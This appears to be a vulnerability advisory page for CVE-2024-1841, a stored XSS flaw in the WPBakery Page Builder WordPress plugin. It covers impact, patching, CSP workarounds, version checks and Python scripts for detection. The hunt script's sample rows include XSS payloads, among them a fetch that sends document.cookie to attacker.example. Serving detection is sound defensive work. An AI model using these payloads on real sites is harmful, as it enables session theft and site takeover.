CVE-2024-1841
📋 TL;DR
The WPBakery Page Builder WordPress plugin has a stored cross-site scripting vulnerability in versions up to 7.5. Authenticated attackers with contributor-level access or higher can inject malicious scripts into post titles, which execute when users view affected pages. This affects all WordPress sites using vulnerable versions of the plugin.
💻 Affected Systems
- WPBakery Page Builder WordPress Plugin
📦 What is this software?
Page Builder by Wpbakery
⚠️ Risk & Real-World Impact
Worst Case
A script injected into a post title runs in the browser of whoever views it, including the editor or administrator who reviews the contributor's pending post. WordPress authentication cookies are HttpOnly, so the realistic payload does not read them; it drives the victim's browser to perform authenticated actions instead (creating an administrator account, installing a plugin or backdoor, editing theme files, changing site URLs), which is full site compromise.
Likely Case
Injected scripts that redirect visitors to phishing or malware sites, inject unwanted content or ads, or perform actions in the session of a logged-in reviewer.
If Mitigated
With the contributor role restricted to trusted accounts and a CSP that blocks inline scripts, impact is limited to content changes within a contributor's own permissions (unpublished posts awaiting review).
🎯 Exploit Status
Exploitation requires an authenticated account with the contributor role or higher. Contributors cannot publish, so the payload in a crafted post title first fires when an editor or administrator views the pending post; once published, it fires for every visitor of a page that renders the title. The attack is straightforward and the details are public in the Wordfence advisory linked below.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.6 or later
Vendor Advisory: https://kb.wpbakery.com/docs/preface/release-notes/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find WPBakery Page Builder.
4. Click 'Update Now' if available.
5. Alternatively, download version 7.6+ from wpbakery.com and upload via FTP.
🔧 Temporary Workarounds
Restrict User Roles
Limit contributor-level access to trusted users only and apply the principle of least privilege; review every existing account with the contributor role or higher.
Content Security Policy
A CSP without 'unsafe-inline' in script-src blocks an injected inline <script> from executing, but WordPress core, the admin dashboard and most themes depend on inline scripts, so the policies below will break parts of the site. Roll them out as Content-Security-Policy-Report-Only first and treat CSP as defence in depth, not as a fix: it limits what the injected script can do, it does not remove the injection.
Add to .htaccess (Apache with mod_headers): Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to wp-config.php (it runs before any output is sent): header("Content-Security-Policy: default-src 'self'");
🧯 If You Can't Patch
- Deactivate the WPBakery plugin until it is patched (pages built with it will show raw shortcodes while it is off)
- Remove contributor role access for untrusted users and review recent post titles created or edited by contributor accounts
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → WPBakery Page Builder → Version. If the version is 7.5 or earlier, you are vulnerable.
Check Version (WP-CLI; the plugin's directory and slug is js_composer, not wpbakery-page-builder):
wp plugin get js_composer --field=version
Verify Fix Applied:
After update, verify WPBakery version is 7.6 or higher in WordPress plugins page.
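The version check above, as an added example that is not part of the advisory or of WPBakery's own code. It reads the plugin header from wp-content/plugins/js_composer/js_composer.php (the plugin directory name is assumed here) and compares versions numerically, because a plain string comparison gets "7.10" < "7.6" wrong and would report a patched site as vulnerable. The sample header is constructed for the demo.

```python
import re
from pathlib import Path

# Fixed release per the advisory: 7.6 or later.
FIXED_VERSION = "7.6"
# Main plugin file relative to wp-content/plugins (assumed directory layout).
PLUGIN_MAIN_FILE = Path("js_composer") / "js_composer.php"

# Matches "Version: 7.5" or " * Version: 7.5" inside the plugin header comment.
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*(\S+)", re.MULTILINE)


def parse_plugin_version(header_text: str):
    """Return the Version: value from a WordPress plugin header block, or None."""
    m = VERSION_RE.search(header_text)
    return m.group(1) if m else None


def version_tuple(v: str):
    """Turn '7.5.1' into (7, 5, 1) so comparison is numeric, not lexical."""
    parts = []
    for piece in v.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group(0)) if digits else 0)
    return tuple(parts)


def is_vulnerable(installed: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly below the fixed version."""
    a, b = version_tuple(installed), version_tuple(fixed)
    n = max(len(a), len(b))
    a += (0,) * (n - len(a))   # pad so 7.6 and 7.6.0 compare equal
    b += (0,) * (n - len(b))
    return a < b


def check_plugins_dir(plugins_dir) -> dict:
    """Inspect a wp-content/plugins directory and report WPBakery's status.

    vulnerable is None when the plugin is present but its version could not be read."""
    main = Path(plugins_dir) / PLUGIN_MAIN_FILE
    if not main.is_file():
        return {"installed": False, "version": None, "vulnerable": False}
    # Plugin headers live at the top of the main file; 8 KB is plenty.
    head = main.read_text(encoding="utf-8", errors="replace")[:8192]
    version = parse_plugin_version(head)
    return {
        "installed": True,
        "version": version,
        "vulnerable": None if version is None else is_vulnerable(version),
    }


# Constructed sample header for the demo (not a real file from the plugin).
SAMPLE_HEADER = """<?php
/*
Plugin Name: WPBakery Page Builder
Plugin URI: http://wpbakery.com
Description: Drag and drop page builder for WordPress.
Version: 7.5
Author: WPBakery
*/
"""

if __name__ == "__main__":
    v = parse_plugin_version(SAMPLE_HEADER)
    print(f"sample header: {v} -> {'VULNERABLE' if is_vulnerable(v) else 'patched'}")
    for candidate in ("7.5", "7.5.1", "7.6", "7.6.0", "7.10"):
        print(f"{candidate:>6}: vulnerable={is_vulnerable(candidate)}")
    print(check_plugins_dir("/var/www/html/wp-content/plugins"))
```

Point it at the real plugins directory of each site (for example from a fleet inventory job) and alert on vulnerable being True or None; None means the header was unreadable and the site needs a manual look.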
📡 Detection & Monitoring
Log Indicators:
- Unusual post title modifications by contributor users
- Script tags in post_title database fields
- Multiple failed login attempts followed by post edits
Network Indicators:
- External script loads or beacons triggered from pages that render post titles (front end or the admin post list)
- Unusual outbound connections after page views
SIEM Query (pseudo-syntax; WordPress core writes no such events, so this assumes an audit-log plugin or WAF forwarding post-update events to the SIEM; match more than a literal <script> tag, since payloads in img/svg event handlers contain none):
source="wordpress.log" AND (event="post_updated" OR event="wp_insert_post") AND user_role="contributor" AND (title CONTAINS "<script" OR title CONTAINS "onerror=" OR title CONTAINS "onload=" OR title CONTAINS "javascript:")
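The "script tags in post_title" indicator and the SIEM query above, as an added example that is not part of the advisory: a hunt over exported post rows (for instance the output of `wp db query` on wp_posts joined with the author's role, or an audit-log export) that decodes HTML entities before matching and looks for event handlers and javascript: URLs as well as <script>. The row fields, the marker list and the sample rows are constructed for this example.

```python
import html
import re

# Markers of active content in a field that should be plain text.
# Hunt list for this example; tune it to your own false-positive rate.
XSS_MARKERS = re.compile(
    r"<\s*script\b"                                                # <script ...>
    r"|<\s*(?:svg|img|iframe|object|embed|math|body|details|video|audio)\b"
    r"|\bon[a-z]+\s*=\s*[\"']?"                                    # onerror=, onload=, ...
    r"|javascript\s*:"                                             # javascript: URLs
    r"|data\s*:\s*text/html",                                      # data:text/html payloads
    re.IGNORECASE,
)


def normalize(title: str) -> str:
    """Decode HTML entities twice (catches double-encoded payloads) and collapse whitespace."""
    return re.sub(r"\s+", " ", html.unescape(html.unescape(title)))


def find_suspicious_titles(rows):
    """Return the rows whose post_title carries an XSS marker, tagged with the match.

    rows: dicts with ID, post_author, author_role and post_title (assumed field names)."""
    hits = []
    for row in rows:
        m = XSS_MARKERS.search(normalize(row["post_title"]))
        if m:
            hits.append({**row, "marker": m.group(0)})
    return hits


# Constructed sample rows for this example (not real site data).
SAMPLE_ROWS = [
    {"ID": 101, "post_author": 7, "author_role": "contributor",
     "post_title": "Quarterly Results <script>fetch('https://attacker.example/c?'+document.cookie)</script>"},
    {"ID": 102, "post_author": 7, "author_role": "contributor",
     "post_title": "Team Photo <img src=x onerror=alert(document.domain)>"},
    {"ID": 103, "post_author": 3, "author_role": "author",
     "post_title": "&lt;svg onload=alert(1)&gt;"},                 # entity-encoded in the export
    {"ID": 104, "post_author": 2, "author_role": "editor",
     "post_title": "10 reasons JavaScript is still great"},        # benign
    {"ID": 105, "post_author": 2, "author_role": "editor",
     "post_title": "Hands-on tutorial: onboarding new hires"},     # benign
    {"ID": 106, "post_author": 7, "author_role": "contributor",
     "post_title": 'Welcome" onmouseover="alert(1)'},              # attribute break-out, no tag
]

if __name__ == "__main__":
    for hit in find_suspicious_titles(SAMPLE_ROWS):
        print(f"post {hit['ID']} by user {hit['post_author']} "
              f"({hit['author_role']}): matched {hit['marker']!r}")
```

Run it over the whole wp_posts table, not only rows by contributors: the bug needs contributor privileges or higher, so an editor account that was phished or shared is just as valid a source. Treat each hit as a lead to verify against the post's revision history, not as a confirmed compromise.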
🔗 References
- https://kb.wpbakery.com/docs/preface/release-notes/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/34d21418-4faf-40bf-a960-79482a592722?source=cve